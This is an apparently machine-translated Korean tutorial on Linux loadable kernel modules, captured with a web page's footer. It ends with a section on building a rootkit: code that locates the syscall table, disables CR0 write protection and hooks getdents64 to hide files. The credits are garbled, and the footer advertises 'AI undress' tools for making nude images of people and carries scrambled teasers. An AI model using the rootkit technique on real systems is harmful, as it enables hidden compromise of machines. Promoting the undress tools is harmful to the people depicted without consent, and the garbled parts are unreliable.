LKM Addict, lkm의 기본을 배워요
안녕하세요 여러분! 오늘은 간단한 "Hello World" 모듈부터 LKM 루트킷 생성까지 LKM(로드 가능한 커널 모듈)을 안내하겠습니다. 이 내용이 도움이 되었다면 자유롭게 공유해 주시고, 끝까지 읽어주신 모든 분들께 미리 감사드립니다. 게시물 하단에 링크된 모든 코드와 참조 자료가 있으므로 소스를 꼭 확인하세요. 저를 믿으세요. 이를 자세히 살펴보고 코드를 수정하면 더 많은 것을 배우는 데 정말 도움이 될 것입니다. 하지만 주의하세요. 일부 코드는 GPL 3 라이센스를 따르므로 해당 약관을 숙지하고 있어야 합니다.
필요한 것:
리눅스-헤더-일반
C 컴파일러(GCC 또는 cc를 권장합니다)
목차:
- 1) LKM이란 무엇이며 어떻게 작동하나요
- 2) LKM Makefile 예시
- 3) 모듈이 커널에 로드되는 방법
- 4) LKM "Hello World"
- 5) 지난 몇 년간의 주요 변화
- 6) Kernel 5.7의 Syscall 테이블 변경
- 7) 공정 모니터링을 위한 LKM
- 8) LKM 루트킷 구축
1) LKM이란 무엇이며 어떻게 작동합니까?
LKM은 전체 커널을 다시 컴파일할 필요 없이 하드웨어용 드라이버를 추가하는 등 Linux 커널의 기능을 확장하는 데 도움이 되는 로드 가능한 커널 모듈입니다. 장치 드라이버(예: 사운드 카드), 파일 시스템 등에 적합합니다. 모든 LKM에는 최소한 다음 두 가지 기본 기능이 필요합니다.
static int __init module_init(void)
{
return 0;
}
static void __exit module_exit(void)
{
}
2) LKM 메이크파일 예:
다음은 모듈 컴파일을 위한 매우 간단한 Makefile입니다.
obj-m := example.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) all: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: $(MAKE) -C $(KDIR) M=$(PWD) clean
3) 모듈이 커널에 로드되는 방법:
lsmod 명령을 사용하면 커널에 로드된 모듈을 볼 수 있습니다. /proc/modules의 정보를 확인합니다. 모듈은 일반적으로 다음과 같은 별칭을 통해 커널을 식별합니다.
별칭 char-major-10–30 소프트독
이것은 modprobe에게 Softdog.o 모듈이 로드되어야 함을 알리고 /lib/modules/version/modules.dep에서 depmod -a를 실행하여 생성된 종속성을 확인합니다.
4) LKM "안녕하세요 세계":
초기본적인 'Hello World' 모듈을 만드는 방법은 다음과 같습니다.
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
static int __init hello_init(void)
{
printk(KERN_INFO "<1>Hello World\n");
return 0;
}
static void __exit hello_exit(void)
{
printk(KERN_INFO"<1> Bye bye!");
}
module_init(hello_init);
module_exit(hello_exit);
MODULE_AUTHOR("BrunoCiccarino");
MODULE_LICENSE("GPL");
5) 수년간 LKM의 주요 변화:
시간이 지남에 따라 LKM에는 상당히 중요한 변화가 있었으므로 이를 Linux 커널 버전별로 분류해 보겠습니다.
커널 2.x(최대 2.6):
동적 LKM 로드 및 언로드에 대한 초기 지원
더 나은 디버깅 도구(OOPS, PANIC).
커널 2.6.x:
보다 나은 기기 관리를 위한 udev를 소개합니다.
더 빠른 응답 시간을 위한 선점형 커널.
NPTL(네이티브 Posix 스레드 라이브러리)은 다중 스레드 프로세스 처리를 개선합니다.
커널 3.x:
네임스페이스 지원, Docker와 같은 컨테이너 기술 개선
파일 시스템 및 GPU 드라이버 개선.
커널 4.x:
KASLR을 통해 커널 보안이 강화됩니다.
더 나은 컨테이너 지원(Cgroups, 네임스페이스).
새로운 하드웨어를 지원합니다.
커널 5.x:
더 나은 파일 시스템 암호화 및 라이브 패치.
단순한 네트워크를 넘어 BPF 확장.
RISC-V 및 ARM 지원이 향상되었습니다.
커널 5.7:
주요 변경 사항: 보안상의 이유로 syscall 테이블(sys_call_table)에 대한 액세스가 더 어려워졌습니다. syscall 테이블을 수정해야 하는 모듈을 조정해야 했습니다.
커널 6.x:
더 안전한 커널 모듈 개발을 위한 Rust 언어 지원
모바일 장치의 에너지 효율성에 중점을 두고 보안 및 격리를 개선했습니다.
6) 커널 5.7의 Syscall 테이블 변경 사항:
Linux 5.7에서는 syscall 테이블을 보호하기 위해 변경되었습니다. 이제 쓰기 금지되어 있어 쉽게 액세스할 수 없습니다. 이는 보안 측면에서는 큰 이점이지만 이에 의존하는 합법적인 모듈에서는 복잡한 문제입니다. sys_call_table을 찾기 위해 kprobes.h를 사용했다면 새로운 전략이 필요합니다. 이제는 쓰기 방지(WP)와 같은 보호 기능으로 인해 직접 수정할 수 없습니다.
7) 공정 모니터링을 위한 LKM:
타이머를 사용하여 주기적으로(예: 2초마다) 검사를 실행하여 커널의 프로세스를 모니터링하는 모듈입니다. 프로세스 생성 및 종료, 파일 액세스, 네트워크 사용 등을 감시합니다.
이를 시작하는 데 도움이 되는 몇 가지 코드는 다음과 같습니다.
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/timer.h>
#include <linux/cred.h>
static struct timer_list procmonitor_timer;
static void procmonitor_check_proc_tree(unsigned long unused)
{
struct task_struct *task;
for_each_process(task)
printk(KERN_INFO "process: %s, PID: %d\n", task->comm, task->pid);
mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(2000));
}
static int __init procmonitor_init(void)
{
setup_timer(&procmonitor_timer, procmonitor_check_proc_tree, 0);
mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(200));
return 0;
}
static void __exit procmonitor_exit(void)
{
del_timer_sync(&procmonitor_timer);
}
module_init(procmonitor_init);
module_exit(procmonitor_exit);
8) LKM 루트킷:
루트킷은 기본적으로 악성 코드를 숨기기 위해 시스템 호출을 하이재킹하는 악성 모듈입니다. syscall 테이블에 연결하여 동작을 수정하는 방법은 다음과 같습니다.
먼저 syscall 테이블을 찾아야 합니다.
unsigned long *find_syscall_table(void)
{
typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
kallsyms_lookup_name_t kallsyms_lookup_name;
register_kprobe(&kp);
kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
unregister_kprobe(&kp);
return (unsigned long*)kallsyms_lookup_name("sys_call_table");
}
그런 다음 syscall 테이블이 있는 메모리를 보호 해제할 수 있습니다.
static inline void unprotect_memory(void)
{
write_cr0_forced(cr0 & ~0x00010000);
}
그런 다음 원래 기능을 후크로 교체하세요.
static int __init ghost_init(void)
{
__syscall_table = find_syscall_table();
if (!__syscall_table) return -1;
cr0 = read_cr0();
orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];
unprotect_memory();
__syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;
protect_memory();
return 0;
}
후크 기능은 파일을 가로채서 숨깁니다.
asmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
int ret = orig_getdents64(fd, dirp, count);
// Intercept the syscall here...
return ret;
}
制作人员
黑客的选择
elinux
内核br
xcellerator
lkmpg
爱猫人士
我的rootkit
二吗啡
위 내용은 LKM Addict, lkm의 기본을 배워요의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
Video Face Swap
완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!
인기 기사
뜨거운 도구
메모장++7.3.1
사용하기 쉬운 무료 코드 편집기
SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.
스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경
드림위버 CS6
시각적 웹 개발 도구
SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)
C# vs. C : 역사, 진화 및 미래 전망
Apr 19, 2025 am 12:07 AM
C#과 C의 역사와 진화는 독특하며 미래의 전망도 다릅니다. 1.C는 1983 년 Bjarnestroustrup에 의해 발명되어 객체 지향 프로그래밍을 C 언어에 소개했습니다. Evolution 프로세스에는 자동 키워드 소개 및 Lambda Expressions 소개 C 11, C 20 도입 개념 및 코 루틴과 같은 여러 표준화가 포함되며 향후 성능 및 시스템 수준 프로그래밍에 중점을 둘 것입니다. 2.C#은 2000 년 Microsoft에 의해 출시되었으며 C와 Java의 장점을 결합하여 진화는 단순성과 생산성에 중점을 둡니다. 예를 들어, C#2.0은 제네릭과 C#5.0 도입 된 비동기 프로그래밍을 소개했으며, 이는 향후 개발자의 생산성 및 클라우드 컴퓨팅에 중점을 둘 것입니다.
C# vs. C : 학습 곡선 및 개발자 경험
Apr 18, 2025 am 12:13 AM
C# 및 C 및 개발자 경험의 학습 곡선에는 상당한 차이가 있습니다. 1) C#의 학습 곡선은 비교적 평평하며 빠른 개발 및 기업 수준의 응용 프로그램에 적합합니다. 2) C의 학습 곡선은 가파르고 고성능 및 저수준 제어 시나리오에 적합합니다.
C의 정적 분석이란 무엇입니까?
Apr 28, 2025 pm 09:09 PM
C에서 정적 분석의 적용에는 주로 메모리 관리 문제 발견, 코드 로직 오류 확인 및 코드 보안 개선이 포함됩니다. 1) 정적 분석은 메모리 누출, 이중 릴리스 및 초기화되지 않은 포인터와 같은 문제를 식별 할 수 있습니다. 2) 사용하지 않은 변수, 데드 코드 및 논리적 모순을 감지 할 수 있습니다. 3) Coverity와 같은 정적 분석 도구는 버퍼 오버플로, 정수 오버플로 및 안전하지 않은 API 호출을 감지하여 코드 보안을 개선 할 수 있습니다.
C 및 XML : 관계와 지원 탐색
Apr 21, 2025 am 12:02 AM
C는 XML과 타사 라이브러리 (예 : TinyXML, Pugixml, Xerces-C)와 상호 작용합니다. 1) 라이브러리를 사용하여 XML 파일을 구문 분석하고 C- 처리 가능한 데이터 구조로 변환하십시오. 2) XML을 생성 할 때 C 데이터 구조를 XML 형식으로 변환하십시오. 3) 실제 애플리케이션에서 XML은 종종 구성 파일 및 데이터 교환에 사용되어 개발 효율성을 향상시킵니다.
C에서 Chrono 라이브러리를 사용하는 방법?
Apr 28, 2025 pm 10:18 PM
C에서 Chrono 라이브러리를 사용하면 시간과 시간 간격을보다 정확하게 제어 할 수 있습니다. 이 도서관의 매력을 탐구합시다. C의 크로노 라이브러리는 표준 라이브러리의 일부로 시간과 시간 간격을 다루는 현대적인 방법을 제공합니다. 시간과 C 시간으로 고통받는 프로그래머에게는 Chrono가 의심 할 여지없이 혜택입니다. 코드의 가독성과 유지 가능성을 향상시킬뿐만 아니라 더 높은 정확도와 유연성을 제공합니다. 기본부터 시작합시다. Chrono 라이브러리에는 주로 다음 주요 구성 요소가 포함됩니다. std :: Chrono :: System_Clock : 현재 시간을 얻는 데 사용되는 시스템 클럭을 나타냅니다. STD :: 크론
C의 미래 : 적응 및 혁신
Apr 27, 2025 am 12:25 AM
C의 미래는 병렬 컴퓨팅, 보안, 모듈화 및 AI/기계 학습에 중점을 둘 것입니다. 1) 병렬 컴퓨팅은 코 루틴과 같은 기능을 통해 향상 될 것입니다. 2)보다 엄격한 유형 검사 및 메모리 관리 메커니즘을 통해 보안이 향상 될 것입니다. 3) 변조는 코드 구성 및 편집을 단순화합니다. 4) AI 및 머신 러닝은 C가 수치 컴퓨팅 및 GPU 프로그래밍 지원과 같은 새로운 요구에 적응하도록 촉구합니다.
C : 죽어 가거나 단순히 진화하고 있습니까?
Apr 24, 2025 am 12:13 AM
c is nontdying; it'sevolving.1) c COMINGDUETOITSTIONTIVENICICICICINICE INPERFORMICALEPPLICATION.2) thelugageIscontinuousUllyUpdated, witcentfeatureslikemodulesandCoroutinestoimproveusActionalance.3) despitechallen
C에서 DMA 운영을 이해하는 방법?
Apr 28, 2025 pm 10:09 PM
C의 DMA는 직접 메모리 액세스 기술인 DirectMemoryAccess를 말하며 하드웨어 장치는 CPU 개입없이 데이터를 메모리로 직접 전송할 수 있습니다. 1) DMA 운영은 하드웨어 장치 및 드라이버에 크게 의존하며 구현 방법은 시스템마다 다릅니다. 2) 메모리에 직접 액세스하면 보안 위험이 발생할 수 있으며 코드의 정확성과 보안이 보장되어야합니다. 3) DMA는 성능을 향상시킬 수 있지만 부적절하게 사용하면 시스템 성능이 저하 될 수 있습니다. 실습과 학습을 통해 우리는 DMA 사용 기술을 습득하고 고속 데이터 전송 및 실시간 신호 처리와 같은 시나리오에서 효과를 극대화 할 수 있습니다.
